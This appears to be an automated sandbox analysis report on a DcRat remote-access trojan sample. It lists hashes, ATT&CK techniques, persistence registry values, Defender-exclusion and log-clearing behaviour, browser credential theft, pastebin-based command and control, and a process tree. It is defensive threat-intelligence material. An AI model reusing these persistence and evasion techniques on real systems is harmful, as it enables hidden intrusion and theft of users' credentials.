dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Resubmissions

14-01-2025 04:21

250114-ey7b5swqav 10

14-01-2025 03:05

250114-dlfszsvmgw 10

Analysis

max time kernel
150s
max time network
152s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
14-01-2025 03:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat defense_evasion discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\Skins\\dwm.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\Skins\\dwm.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\cmd.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\Start Menu\\Idle.exe\", \"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\Program Files\\Windows Media Player\\Skins\\dwm.exe\""	ServerComponenthostMonitorDll.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2596	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2956	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1560	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2980	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2236	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2456	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1360	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	696	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	620	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	772	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1124	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	448	2388	schtasks.exe	37
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2176	2388	schtasks.exe	37

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1100 created 1152	1100	twain_32.exe	20
PID 1100 created 1152	1100	twain_32.exe	20
PID 1100 created 1152	1100	twain_32.exe	20
PID 1100 created 1152	1100	twain_32.exe	20
PID 1100 created 1152	1100	twain_32.exe	20
PID 1100 created 1152	1100	twain_32.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20
PID 2268 created 1152	2268	updater.exe	20

Command and Scripting Interpreter: PowerShell 1 TTPs 23 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2052	powershell.exe
900	powershell.exe
2344	powershell.exe
2336	powershell.exe
2616	powershell.exe
1108	powershell.exe
1736	powershell.exe
1596	powershell.exe
2604	powershell.exe
1440	powershell.exe
1684	powershell.exe
340	powershell.exe
1096	powershell.exe
928	powershell.exe
3004	powershell.exe
1476	powershell.exe
2092	powershell.exe
1488	powershell.exe
1296	powershell.exe
1968	powershell.exe
928	powershell.exe
2224	powershell.exe
2880	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
1144	Astral private DLL.exe
1100	twain_32.exe
2792	ServerComponenthostMonitorDll.exe
2692	csrss.exe
2268	updater.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx	svchost.exe

Loads dropped DLL 5 IoCs

pid	Process
1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
2848	cmd.exe
2848	cmd.exe
1548	taskeng.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Windows Media Player\\Skins\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\Start Menu\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Windows Media Player\\Skins\\dwm.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Recovery\\20e7eb62-69f6-11ef-be0c-62cb582c238c\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Admin\\Start Menu\\Idle.exe\""	ServerComponenthostMonitorDll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	pastebin.com
10	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1012	powercfg.exe
1460	cmd.exe
1904	powercfg.exe
992	powercfg.exe
1796	powercfg.exe
2432	cmd.exe
2716	powercfg.exe
2712	powercfg.exe
2168	powercfg.exe
2608	powercfg.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	\??\c:\Windows\System32\CSC6C0CDF6D93574EA6B8D254562C487071.TMP	csc.exe
File created	\??\c:\Windows\System32\dzuhbf.exe	csc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1100 set thread context of 2680	1100	twain_32.exe	114
PID 2268 set thread context of 668	2268	updater.exe	137
PID 2268 set thread context of 2916	2268	updater.exe	145
PID 2268 set thread context of 2104	2268	updater.exe	146

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Windows Media Player\Skins\dwm.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Windows Media Player\Skins\6cb0b6c459d5d3	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2368	sc.exe
1664	sc.exe
2980	sc.exe
1192	sc.exe
2052	sc.exe
2136	sc.exe
1648	sc.exe
1472	sc.exe
2920	sc.exe
2328	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0b7727b3166db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2832	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2596	schtasks.exe
1560	schtasks.exe
772	schtasks.exe
1124	schtasks.exe
448	schtasks.exe
3048	schtasks.exe
3012	schtasks.exe
2084	schtasks.exe
696	schtasks.exe
2980	schtasks.exe
2236	schtasks.exe
536	schtasks.exe
2176	schtasks.exe
2956	schtasks.exe
2032	schtasks.exe
2456	schtasks.exe
1360	schtasks.exe
620	schtasks.exe
2620	schtasks.exe
3052	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe
2792	ServerComponenthostMonitorDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	ServerComponenthostMonitorDll.exe
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	2344	powershell.exe
Token: SeDebugPrivilege	1096	powershell.exe
Token: SeDebugPrivilege	900	powershell.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeDebugPrivilege	1296	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	2692	csrss.exe
Token: SeDebugPrivilege	928	powershell.exe
Token: SeShutdownPrivilege	2716	powercfg.exe
Token: SeDebugPrivilege	2680	dialer.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeShutdownPrivilege	2168	powercfg.exe
Token: SeShutdownPrivilege	2608	powercfg.exe
Token: SeShutdownPrivilege	1012	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	856	svchost.exe
Token: SeIncreaseQuotaPrivilege	856	svchost.exe
Token: SeSecurityPrivilege	856	svchost.exe
Token: SeTakeOwnershipPrivilege	856	svchost.exe
Token: SeLoadDriverPrivilege	856	svchost.exe
Token: SeSystemtimePrivilege	856	svchost.exe
Token: SeBackupPrivilege	856	svchost.exe
Token: SeRestorePrivilege	856	svchost.exe
Token: SeShutdownPrivilege	856	svchost.exe
Token: SeSystemEnvironmentPrivilege	856	svchost.exe
Token: SeUndockPrivilege	856	svchost.exe
Token: SeManageVolumePrivilege	856	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 1144	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 1620 wrote to memory of 1144	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 1620 wrote to memory of 1144	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 1620 wrote to memory of 1144	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	30
PID 1620 wrote to memory of 1100	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 1620 wrote to memory of 1100	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 1620 wrote to memory of 1100	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 1620 wrote to memory of 1100	1620	b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240.exe	31
PID 1144 wrote to memory of 2488	1144	Astral private DLL.exe	32
PID 1144 wrote to memory of 2488	1144	Astral private DLL.exe	32
PID 1144 wrote to memory of 2488	1144	Astral private DLL.exe	32
PID 1144 wrote to memory of 2488	1144	Astral private DLL.exe	32
PID 2488 wrote to memory of 2848	2488	WScript.exe	33
PID 2488 wrote to memory of 2848	2488	WScript.exe	33
PID 2488 wrote to memory of 2848	2488	WScript.exe	33
PID 2488 wrote to memory of 2848	2488	WScript.exe	33
PID 2848 wrote to memory of 2832	2848	cmd.exe	35
PID 2848 wrote to memory of 2832	2848	cmd.exe	35
PID 2848 wrote to memory of 2832	2848	cmd.exe	35
PID 2848 wrote to memory of 2832	2848	cmd.exe	35
PID 2848 wrote to memory of 2792	2848	cmd.exe	36
PID 2848 wrote to memory of 2792	2848	cmd.exe	36
PID 2848 wrote to memory of 2792	2848	cmd.exe	36
PID 2848 wrote to memory of 2792	2848	cmd.exe	36
PID 2792 wrote to memory of 2940	2792	ServerComponenthostMonitorDll.exe	41
PID 2792 wrote to memory of 2940	2792	ServerComponenthostMonitorDll.exe	41
PID 2792 wrote to memory of 2940	2792	ServerComponenthostMonitorDll.exe	41
PID 2940 wrote to memory of 2736	2940	csc.exe	43
PID 2940 wrote to memory of 2736	2940	csc.exe	43
PID 2940 wrote to memory of 2736	2940	csc.exe	43
PID 2792 wrote to memory of 2616	2792	ServerComponenthostMonitorDll.exe	59
PID 2792 wrote to memory of 2616	2792	ServerComponenthostMonitorDll.exe	59
PID 2792 wrote to memory of 2616	2792	ServerComponenthostMonitorDll.exe	59
PID 2792 wrote to memory of 2336	2792	ServerComponenthostMonitorDll.exe	60
PID 2792 wrote to memory of 2336	2792	ServerComponenthostMonitorDll.exe	60
PID 2792 wrote to memory of 2336	2792	ServerComponenthostMonitorDll.exe	60
PID 2792 wrote to memory of 1968	2792	ServerComponenthostMonitorDll.exe	62
PID 2792 wrote to memory of 1968	2792	ServerComponenthostMonitorDll.exe	62
PID 2792 wrote to memory of 1968	2792	ServerComponenthostMonitorDll.exe	62
PID 2792 wrote to memory of 2344	2792	ServerComponenthostMonitorDll.exe	63
PID 2792 wrote to memory of 2344	2792	ServerComponenthostMonitorDll.exe	63
PID 2792 wrote to memory of 2344	2792	ServerComponenthostMonitorDll.exe	63
PID 2792 wrote to memory of 1296	2792	ServerComponenthostMonitorDll.exe	65
PID 2792 wrote to memory of 1296	2792	ServerComponenthostMonitorDll.exe	65
PID 2792 wrote to memory of 1296	2792	ServerComponenthostMonitorDll.exe	65
PID 2792 wrote to memory of 1096	2792	ServerComponenthostMonitorDll.exe	66
PID 2792 wrote to memory of 1096	2792	ServerComponenthostMonitorDll.exe	66
PID 2792 wrote to memory of 1096	2792	ServerComponenthostMonitorDll.exe	66
PID 2792 wrote to memory of 1440	2792	ServerComponenthostMonitorDll.exe	68
PID 2792 wrote to memory of 1440	2792	ServerComponenthostMonitorDll.exe	68
PID 2792 wrote to memory of 1440	2792	ServerComponenthostMonitorDll.exe	68
PID 2792 wrote to memory of 1108	2792	ServerComponenthostMonitorDll.exe	69
PID 2792 wrote to memory of 1108	2792	ServerComponenthostMonitorDll.exe	69
PID 2792 wrote to memory of 1108	2792	ServerComponenthostMonitorDll.exe	69
PID 2792 wrote to memory of 2052	2792	ServerComponenthostMonitorDll.exe	71
PID 2792 wrote to memory of 2052	2792	ServerComponenthostMonitorDll.exe	71
PID 2792 wrote to memory of 2052	2792	ServerComponenthostMonitorDll.exe	71
PID 2792 wrote to memory of 1684	2792	ServerComponenthostMonitorDll.exe	72
PID 2792 wrote to memory of 1684	2792	ServerComponenthostMonitorDll.exe	72
PID 2792 wrote to memory of 1684	2792	ServerComponenthostMonitorDll.exe	72
PID 2792 wrote to memory of 1476	2792	ServerComponenthostMonitorDll.exe	74
PID 2792 wrote to memory of 1476	2792	ServerComponenthostMonitorDll.exe	74
PID 2792 wrote to memory of 1476	2792	ServerComponenthostMonitorDll.exe	74
PID 2792 wrote to memory of 1488	2792	ServerComponenthostMonitorDll.exe	75

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:284
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:740
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:812
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1128
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
